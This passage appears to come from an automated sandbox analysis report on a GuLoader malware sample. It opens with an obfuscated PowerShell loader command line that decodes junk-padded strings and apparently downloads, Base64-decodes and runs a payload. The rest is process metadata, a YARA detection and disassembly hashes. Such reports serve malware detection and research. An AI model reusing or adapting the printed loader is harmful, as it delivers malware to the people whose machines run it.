paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid) mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren $Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren (Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren (Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. S.utcFetico Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens 'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram ');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet) Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:15:03:24
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:15:03:27
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
                                                Imagebase:0x7ff6e68e0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Executed Functions

                                                  Function 00007FF849004149 Relevance: .5, Instructions: 468COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162542169.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92dc37583e34b387b0584ef65fd4be9206339996819433bf345a92e908f30823
                                                  • Instruction ID: 87f8cde6656c1ec0ca81d6981074fc3931101a5a78d22aacb0874a3b49d00256
                                                  • Opcode Fuzzy Hash: 92dc37583e34b387b0584ef65fd4be9206339996819433bf345a92e908f30823
                                                  • Instruction Fuzzy Hash: 85E1E231E0EACA8FEBA5EF2868552B57BE1EF55250F4801FAD00DC71D3FA18E8458345
                                                  Function 00007FF8490059C3 Relevance: .5, Instructions: 464COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162542169.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 36114c7d7603f8973efa159dae8758ad533e9f949cad76c5ab2dccbf3687e3ab
                                                  • Instruction ID: 6e714bddb737f376daa071356b0a87e3ba943bd695148e219b1e625b9a5d2cc7
                                                  • Opcode Fuzzy Hash: 36114c7d7603f8973efa159dae8758ad533e9f949cad76c5ab2dccbf3687e3ab
                                                  • Instruction Fuzzy Hash: 24E10532D1EBCA4FE7B69A2968551B47FE1EF53660B0901FBC049C71D3E918EC4A8352
                                                  Function 00007FF8490083C5 Relevance: .4, Instructions: 431COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162542169.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a059ea25d61972ae7a4e4147d94f0c92cff37b0cdadd39f9e0e7d35daf8173bd
                                                  • Instruction ID: b46d17580e1b630ca0bf54d7e1d14be0610fcfb296d8b38a72b36fcc482a6b71
                                                  • Opcode Fuzzy Hash: a059ea25d61972ae7a4e4147d94f0c92cff37b0cdadd39f9e0e7d35daf8173bd
                                                  • Instruction Fuzzy Hash: 26D10431D1EACA5FEBB5AF2868146B57BE0FF15354F0900FAD84DC7093EA19E8058351
                                                  Function 00007FF84900532D Relevance: .4, Instructions: 372COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162542169.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbd98605790d8762fb8178b23abd6c0c1236cbce2e6119a0a37c4a2fe23a55cc
                                                  • Instruction ID: d9b73d5708133e0409770c5490080004613c9dcaf7897b9216a32bc3d5a65f0f
                                                  • Opcode Fuzzy Hash: bbd98605790d8762fb8178b23abd6c0c1236cbce2e6119a0a37c4a2fe23a55cc
                                                  • Instruction Fuzzy Hash: 49B10331E0DACA4FEBA5EE2968646B97BE1EF56255F0801FBD00DC7193ED18DC048351
                                                  Function 00007FF8490042E7 Relevance: .2, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162542169.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 656702f8aca5f3f8e7109719ec9497cd704b591a87d603d07c13f6ddb48018bd
                                                  • Instruction ID: c1a79c70df93087d9008f7bf7b20716912615950b2d87a96ccff0f470058bfc1
                                                  • Opcode Fuzzy Hash: 656702f8aca5f3f8e7109719ec9497cd704b591a87d603d07c13f6ddb48018bd
                                                  • Instruction Fuzzy Hash: 3C416D31D1EACA8FEBA5EB28645527976E1EF55290F5800FAD40CD71D3FE1CE8448309
                                                  Function 00007FF849005452 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162542169.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f27e9217f47efc56028098576af9d8c0efe81104e14a74cfca86ff889d6bcde5
                                                  • Instruction ID: 60214e0fa230f6b04a7dd607c8b61062814113b1b8e4f4e158ba70b2152b1f29
                                                  • Opcode Fuzzy Hash: f27e9217f47efc56028098576af9d8c0efe81104e14a74cfca86ff889d6bcde5
                                                  • Instruction Fuzzy Hash: AA31A161D1EAC64FFBA5AA2928252B87AE1EF066A5F4801FAD40DD31D2FD0CE8044256
                                                  Function 00007FF848F33945 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162199861.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                  • Instruction ID: 5581c1bbeeb35668f75aff93aa97cf07b4c35495046711a11288b2c77098a6b1
                                                  • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                  • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45